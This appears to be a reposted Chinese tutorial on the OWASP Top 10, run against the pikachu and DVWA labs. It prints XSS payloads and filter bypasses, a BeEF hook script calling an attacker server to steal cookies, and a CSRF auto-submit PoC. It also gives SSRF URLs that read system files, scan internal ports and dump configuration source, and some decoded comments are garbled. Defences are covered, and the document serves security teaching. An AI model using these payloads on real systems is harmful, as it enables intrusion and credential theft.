OWASP TOP10

news2024/12/27 5:10:12

OWASP TOP10

OWASP网址:http://ww.owasp.org.cn

A01:失效的访问控制

例如:越权漏洞

案例1:

正常:每个人登录教务系统,只能查询自己的成绩信息

漏洞:张三登录后可以查看自己的成绩  例如:score?stuno=231011;如果张三输入了李四的学号,竟然可已查询李四的成绩 。。   这就属于越权漏洞、也属于失效的访问控制

案例2:

某些文库网站,要想下载相应的文章需要支付费用,我支付并下载了文章1,url=download?article=23123:通过遍历或其他方式获取了文章2的编号、修改url,可以再不支付的情况下,下载文章2.  。 。    这也输入越权漏洞、也属于失效的访问控制

A02:加密机制失效(敏感信息泄露)

2017年类别名称是敏感信息泄露、以漏洞产生的后果命名;2021年以漏洞产生的原因命名

为加密机制失效

案例1:

使用google hacking语法进行敏感信息收集。   除了google以外,一些常见的搜索引擎包括必应、百度也支持google hacking语法

filetype:xls 身份证号

 

A03:注入

SQL注入、XSS(JS代码)注入、命令注入、代码注入等

A04:不安全设计(2021新漏洞类别)

一个软件项目的生命周期:

需求分析->项目设计->项目实现->项目测试->维护上线->代码审计

安全左移

A05:安全配置错误(合并)

2021的类别包含了2017年的XXE漏洞

A06:自带缺陷和过时的组件(使用含有已知漏洞的组件)

案例1:

很多博客网站,都为注册用户提供了发表文章的功能。其中编写文章内容时,都会使用编辑器组件,方便文章内容的编写,如果网站本身没有漏洞,但是编辑器插件有漏洞,也会给网站带来安全风险

A07:身份识别和身份验证错误(失效的身份认证)

例如:弱口令属于这类漏洞

A08:软件和数据完整性故障(不安全的反序列化)

A09:安全日志和监控故障(不足的日志记录和监控)

A10:SSRF服务器端请求伪造(2021新漏洞类别)

XSS跨站脚本

XSS介绍
XSS分类

持久型也称为存储型

反射型XSS攻击原理

反射型XSS实例

url是get传参

运行结果
基于pikachu靶场的反射性XSS实验

F12,修改文本框长度

在文本框输入:<script>alert(1)</script> ,只要有弹框效果的出现,就说明有XSS漏洞

反射型XSS常见功能点

产品、新闻等搜索框功能,有可能存在反射型XSS

反射型XSS:真实案例:搜索结果"" >> 西安夏溪电子科技有限公司

在文本框输入:<script>alert(1)</script> ,只要有弹框效果的出现,就说明有XSS漏洞

持久型(存储型)XSS攻击原理
持久型XSS概念

持久型XSS实例
结果

持久型XSS常见功能点

逢框必X 只要有输入框,就有可能有XSS漏洞

发表文章、文章评论

商品评价、回复

用餐评价

DOM型XSS原理

DOM型XSS概念

DOM型XSS实例

DVWA账号admin 密码password

弹窗意味着存在该类型漏洞

恶意数据:payload     <script>alert(1)</script>

DOM型XSS常见功能点

只要在前端页面中使用了参数,都可能导致DOM型XSS。

反射型XSS和DOM型XSS的对比
不同点:

反射型XSS的恶意参数会发送给服务器,并通过服务器反射回浏览器

DOM型XSS的恶意参数不会发送给服务器,直接被页面的JS代码使用;

相同点:

两者漏洞利用(攻击)步骤相同。都是先构造恶意链接发送给受害者,引诱受害者点击

payload

为了验证或者测试漏洞利用所写的特殊数据,有时称为payload

<script>alert(1)</script>

以反射型XSS为例,DVWA靶场不同安全等级
Low:

payload   :  <script>alert(1)</script>

Medium:

 过滤代码:$name = str_replace( '<script>', '', $_GET[ 'name' ] );

输入的$name,如果有<script>就替换成

str_replace()  字符串替换函数

针对这个限制,我们采用大小写绕过,因为HTML标签不区分大小写

payload  :   <SCRIPT>alert(1)</SCRIPT>

High:

 过滤代码:$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

无论script哪个字母是大写或小写,都会被替换成空

preg_replace()正则替换

payload  :   <img src=1  οnerrοr=alert(1)>

故意把路径格式写错,则执行alert(1)

Impossible:

BeEF-XSS攻击实战
BeEF介绍
BeFF原理

BeFF功能介绍

在kali中安装BeFF
  1. apt-get update
  1. 执行apt-get install ruby,先安装ruby,beEF是基于ruby语言开发的

apt-get install ruby

  1. 执行apt-get install beef-xss命令,安装BeEF。

apt-get install beef-xss

4、输入beef-xss命令,启动BeEF

输入一个密码,例如123456后,回车

攻击目标浏览器

将代码<script src="http://192.168.10.224:3000/hook.js"></script>  写入有xss漏洞的服务器

  1. cookie获取
  2. 浏览器劫持
3)钓鱼

XSS攻击的防御
  1. 输入端过滤

使用preg_replace()对特殊字符进行限制

2)输出端过滤

$name = htmlspecialchars($name);    将特殊字符<>做html实体编码转换

  1. Http only

在前端不允许使用js读取cookie数据

CSRF跨站请求伪造

CSRF介绍

CSRF攻击流程

sessionid(用户信息)向服务器提交是自动的,不需要代码实现

基于pikachu靶场的CSRF实例
1)CSRF---GET

抓取点击submit时的数据包

2)CSRF---POST
3)CSRF_token

Token值每次刷新都不一样,安全性高

快速生成CSRF--POC脚本

<script>

window.οnlοad=function(){

document.getElementById("postsubmit").click();

}

</script>

得到一个结论,从用户角度,操作完之后一定退出登录,再操作其他网站,就可以避免CSRF攻击

但是:从开发者角度出发,即使用户不退出登录,我们也应该对CSRF攻击进行防御,引入CSRFtoken

CSRF防御实例
1)引入CSRF_token(一次性,随机性)

2)REFERER属性

Referer校验,比对HOST地址与数据包发出的地址,如果不同则无法执行后续修改密码的操作

检查数据包中的Referer的值,是否与当前url来自同一个网站

3)曾用密码确认
  1. 短信邮件确认
CSRF与XSS的区别

利用XSS漏洞可以拿到cookie的数据(sessionid)但是利用CSRF漏洞只是借用了cookie的数据,无法获取cookie的数据(sessionid)

XSS漏洞比CSRF漏洞更危险。甚至对安全要求不严格的网站,会忽略CSRF漏洞

SSRF服务器端请求伪造

SSRF概念

SSRF攻击流程

SSRF场景

都包含url参数

SSRF相关的PHP函数
1)cur_exec()--执行curl命令

Curl是一个工具,工具的功能非常强大,可以完成文件的上传和下载、html页面的访问,同时还支持很多的协议

2)file_get_contents()函数

读取通过参数指定的文件的内容

SSRF危害
SSRF   curl漏洞利用
  1. 正常访问外网

参数是百度的网址

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com

参数是淘宝的网址

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.taobao.com

参数是京东的网址

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.jd.com

  1. 漏洞利用

参数是windows配置文件

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=file:///c:/windows/win.ini

参数是内网服务器

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=http://192.168.10.143

  1. 探测内网服务器端口/服务信息

21、22、80、3306返回了对应的服务信息、表示端口开放

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:21

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:2

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:80

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:3306

6379端口探测没有返回任何信息,表示端口未开放

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_curl.php?url=dict://192.168.10.143:6379

结合burpsuite去探测端口

SSRF   curl漏洞利用
1)正常访问外网

读取百度首页

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php?file=http://www.baidu.com

2)漏洞利用

读取windows的配置文件

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php?file=c:/windows/win.ini

读取探针文件,返回服务器信息

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/phpinfo.php

3)读取php源码(只读)

http://127.0.0.1/pikachu/pikachu/vul/ssrf/ssrf_fgc.php

?file=php://filter/read=convert.base64-encode/resource=../../inc/config.inc.php

  php伪协议 ../上层路径

base64是编解码  不是加解密

读到的是base64编码后的文件

PD9waHAKLy/lhajlsYBzZXNzaW9uX3N0YXJ0CnNlc3Npb25fc3RhcnQoKTsKLy/lhajlsYDlsYXorr7nva7ml7bljLoKZGF0ZV9kZWZhdWx0X3RpbWV6b25lX3NldCgnQXNpYS9TaGFuZ2hhaScpOwovL+WFqOWxgOiuvue9rum7mOiupOWtl+espgpoZWFkZXIoJ0NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwovL+WumuS5ieaVsOaNruW6k+i/nuaOpeWPguaVsApkZWZpbmUoJ0RCSE9TVCcsICcxMjcuMC4wLjEnKTsvL+WwhmxvY2FsaG9zdOaIluiAhTEyNy4wLjAuMeS/ruaUueS4uuaVsOaNruW6k+acjeWKoeWZqOeahOWcsOWdgApkZWZpbmUoJ0RCVVNFUicsICdyb290Jyk7Ly/lsIZyb2905L+u5pS55Li66L+e5o6lbXlzcWznmoTnlKjmiLflkI0KZGVmaW5lKCdEQlBXJywgJ3Jvb3QnKTsvL+WwhnJvb3Tkv67mlLnkuLrov57mjqVteXNxbOeahOWvhuegge+8jOWmguaenOaUueS6hui/mOaYr+i/nuaOpeS4jeS4iu+8jOivt+WFiOaJi+WKqOi/nuaOpeS4i+S9oOeahOaVsOaNruW6k++8jOehruS/neaVsOaNruW6k+acjeWKoeayoemXrumimOWcqOivtO+8gQpkZWZpbmUoJ0RCTkFNRScsICdwaWthY2h1Jyk7Ly/oh6rlrprkuYnvvIzlu7rorq7kuI3kv67mlLkKZGVmaW5lKCdEQlBPUlQnLCAnMzMwNicpOy8v5bCGMzMwNuS/ruaUueS4um15c3Fs55qE6L+e5o6l56uv5Y+j77yM6buY6K6kdGNwMzMwNgoKPz4K

解码

<?php

//全局session_start

session_start();

//全局居设置时区

date_default_timezone_set('Asia/Shanghai');

//全局设置默认字符

header('Content-type:text/html;charset=utf-8');

//定义数æ®åº“连接å‚æ•°

define('DBHOST', '127.0.0.1');//å°†localhost或者127.0.0.1修改为数æ®åº“æœåŠ¡å™¨çš„地å€

define('DBUSER', 'root');//å°†root修改为连接mysql的用户å

define('DBPW', 'root');//å°†root修改为连接mysql的密ç ï¼Œå¦‚果改了还是连接ä¸ä¸Šï¼Œè¯·å…ˆæ‰‹åŠ¨è¿žæŽ¥ä¸‹ä½ çš„æ•°æ®åº“,确ä¿æ•°æ®åº“æœåŠ¡æ²¡é—®é¢˜åœ¨è¯´ï¼

define('DBNAME', 'pikachu');//自定义,建议ä¸ä¿®æ”¹

define('DBPORT', '3306');//å°†3306修改为mysql的连接端å£ï¼Œé»˜è®¤tcp3306

?>

SSRF漏洞利用实战

SSRF防御
1)禁用不需要的协议

例如仅允许http和https请求

    // 1、初始化

    $CH = curl_init($URL);

    // 2、设置选项

    curl_setopt($CH, CURLOPT_HEADER, FALSE);

    curl_setopt($CH, CURLOPT_SSL_VERIFYPEER, FALSE);

    // 2.2限制只能使用HTTP/HTTPS协议

    curl_setopt($CH,CURLOPT_PROTOCOLS,CURLPROTO_HTTP|CURLPROTO_HTTPS);

    // 3、执行命令

    $RES = curl_exec($CH);

    curl_close($CH) ;

2)对参数使用黑名单或白名单

// 白名单

    if($URL!="http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php"){

        // 结束程序

        die("禁止访问");

    }

3)限制请求端口

乌云镜像链接

乌云网镜像丨乌云知识库丨Wooyun镜像丨乌云漏洞平台

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1449666.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

WebSocket 通信流程,注解和Spring实现WebSocket ,实战多人聊天室系统

一、前言 实现即时通信常见的有四种方式-分别是&#xff1a;轮询、长轮询(comet)、长连接(SSE)、WebSocket。 ①短轮询 很多网站为了实现推送技术&#xff0c;所用的技术都是轮询。轮询是在特定的的时间间隔&#xff08;如每1秒&#xff09;&#xff0c;由客户端浏览器对服务…

JavaScript中的querySelector()方法是什么,它是如何工作的?

在JavaScript中&#xff0c;有时您需要访问HTML元素。querySelector方法是一个Web API&#xff0c;它选择与传入的指定CSS选择器匹配的第一个元素。 但是&#xff0c;更详细地说&#xff0c;这是如何工作的呢&#xff1f;在本文中&#xff0c;我们将看一些如何使用querySelect…

2022年12月电子学会青少年软件编程 中小学生Python编程等级考试二级真题解析(判断题)

2022年12月Python编程等级考试二级真题解析 判断题&#xff08;共10题&#xff0c;每题2分&#xff0c;共20分&#xff09; 26、字典的元素可以通过键来访问&#xff0c;也可以通过索引(下标)来访问 答案&#xff1a;错 考点分析&#xff1a;考查字典相关知识&#xff0c;字…

Java与JavaScript的区别与联系

Java是目前编程领域使用非常广泛的编程语言&#xff0c;相较于JavaScript&#xff0c;Java更被人们熟知。很多Java程序员想学门脚本语言&#xff0c;一看JavaScript和Java这么像&#xff0c;很有亲切感&#xff0c;那干脆就学它了&#xff0c;这也间接的帮助了JavaScript的发展…

vivado Shift Registers、Dynamic Shift Registers

移位寄存器是一个触发器链&#xff0c;允许数据在固定&#xff08;静态&#xff09;数字上传播延迟阶段。相反&#xff0c;在动态移位寄存器中&#xff0c;传播链的长度在电路操作期间动态变化。从“coding”下载编码示例文件示例。 静态移位寄存器元件 静态移位寄存器通常包…

收藏:不错的讲座《拆解成功领导者的三重底层思维逻辑》

在B 站看到个不错的讲座《拆解成功领导者的三重底层思维逻辑》&#xff0c;地址&#xff1a;第145期-拆解成功领导者的三重底层思维逻辑_哔哩哔哩_bilibili 演讲内容文章摘要在这里&#xff1a;《直播精华 | 拆解成功领导者的思维逻辑》&#xff08;直播精华 | 拆解成功领导者的…

揭秘 2024 春晚刘谦魔术——代码还原

其他系列文章导航 Java基础合集数据结构与算法合集 设计模式合集 多线程合集 分布式合集 ES合集 文章目录 其他系列文章导航 文章目录 前言 一、魔术大概流程 二、代码实现各个步骤 2.1 partition&#xff08;对半撕牌&#xff09; 2.2 bottom&#xff08;将 n 张牌置底…

力扣1732. 找到最高海拔(前缀和)

Problem: 1732. 找到最高海拔 文章目录 题目描述思路及解法复杂度Code 题目描述 思路及解法 1.求取数组gain的大小 n n n; 2.定义一个大小为 n 1 n 1 n1的数组preSum; 3.先求取前 n n n个元素的前缀和&#xff0c;再最后单独处理preSum[n];其中preSum[n] preSum[n - 1] gai…

使用playwright进行自动化端到端测试

项目希望能接入自动化端到端测试提高可靠性&#xff0c;发现微软的 playwright 还挺好用的&#xff0c;推荐一下&#xff0c;顺便说下遇到的一些难点以及最佳实践。 难点 登录 项目不能帐号密码登录&#xff0c;只能扫二维码 临时方案是先自己扫码保存 cookie 用于测试&#…

寒假思维训练day22 D. Divisible Pairs

更新一道赛时想了很久才想通的题。 链接&#xff1a;Problem - 1931D - Codeforces Part1 题意&#xff1a; 给定一个长度为n的数组a, 再给定两个整数x, y, 其中, 定义取两个不同索引i, j, 满足, 的为美丽对&#xff0c;问数组中有几个这样的美丽对。 Part2 题解&#xff1a; …

高中信息技术—数据采集与编码(一)

计算机技术的应用&#xff0c;使得数据的处理方式发生了巨大的转变&#xff0c;要用计算机处理这些数据&#xff0c;需要对采集到的数据进行一定的转换。 采集方式 1.人工采集—观察、实验 2.机器采集 互联网—网络爬虫 传感器—自然信源 数字化 信息可用模拟信号或数字信号表…

2.11:递归操作

1.递归实现n! 程序代码&#xff1a; 1 #include<stdio.h>2 #include<string.h>3 #include<stdlib.h>4 int fun(int n);5 int main(int argc, const char *argv[])6 {7 int n;8 printf("please enter n:");9 scanf("%d",&am…

嵌入式C语言学习——基于Linux与GCC(二)

系列文章目录 一.C语言常用关键字及运算符操作 文章目录 系列文章目录内存四区指针指针概述指针 修饰符constvoliatiletypedef 指针运算符多级指针 数组数组空间字符空间及地址 结构体、共用体定义、字节对齐位域 内存分布图段错误分析 内存四区 C/C语言的内存四区&#xff…

LabVIEW伺服阀动静态测试系统

LabVIEW伺服阀动静态测试系统 基于LabVIEW开发了一套伺服阀动静态测试系统&#xff0c;提高伺服阀在电液伺服控制系统中的性能测试精度和效率。通过设计合理的液压系统、电控系统及软件系统&#xff0c;实现了伺服阀的动态和静态特性测试&#xff0c;采用流量-压力双闭环稳态控…

CSS之BFC

BFC概念 BFC&#xff08;Block Formatting Context&#xff09;即块级格式化上下文&#xff0c;是Web页面的可视CSS渲染的一部分。它是一个独立的渲染区域&#xff0c;让其中的元素在布局上与外部的元素互不影响。简单来说&#xff0c;BFC提供了一个环境&#xff0c;允许内部的…

【51单片机】初学者必读的一文【探究定时计数器与中断系统是如何配合起来的?】(9)

前言 大家好吖&#xff0c;欢迎来到 YY 滴单片机系列 &#xff0c;热烈欢迎&#xff01; 本章主要内容面向接触过单片机的老铁 主要内容含&#xff1a; 欢迎订阅 YY滴C专栏&#xff01;更多干货持续更新&#xff01;以下是传送门&#xff01; YY的《C》专栏YY的《C11》专栏YY的…

AI工具导航网站介绍

给大家介绍一个AI工具导航网站&#xff1a;https://www.ainav.net/&#xff0c;里面有多种AI工具及开源AI应用。

Qt:自定义信号,信号emit,传参问题,信号槽与moc

一、自定义信号&#xff0c;信号emit 1、自定义信号 在头文件中 加入signals&#xff1a; 就可以编写信号 2、emit emit的作用是通知信号发生 二、跨UI控件传参 每次按Dialog添加按钮主控件数字会增长 // .h private slots:void on_btnAdd_clicked(); signals:void sign…

SelfAttention|自注意力机制ms简单实现

自注意力机制学习有感 观看b站博主的讲解视频以及跟着他的pytorch代码实现mindspore的自注意力机制&#xff1a;up主讲的很好&#xff0c;推荐入门自注意力机制。 import mindspore as ms import mindspore.nn as nn from mindspore import Parameter from mindspore import …

每日五道java面试题之java基础篇(九)

目录&#xff1a; 第一题 你们项⽬如何排查JVM问题第二题 ⼀个对象从加载到JVM&#xff0c;再到被GC清除&#xff0c;都经历了什么过程&#xff1f;第三题 怎么确定⼀个对象到底是不是垃圾&#xff1f;第四题 JVM有哪些垃圾回收算法&#xff1f;第五题 什么是STW&#xff1f; 第…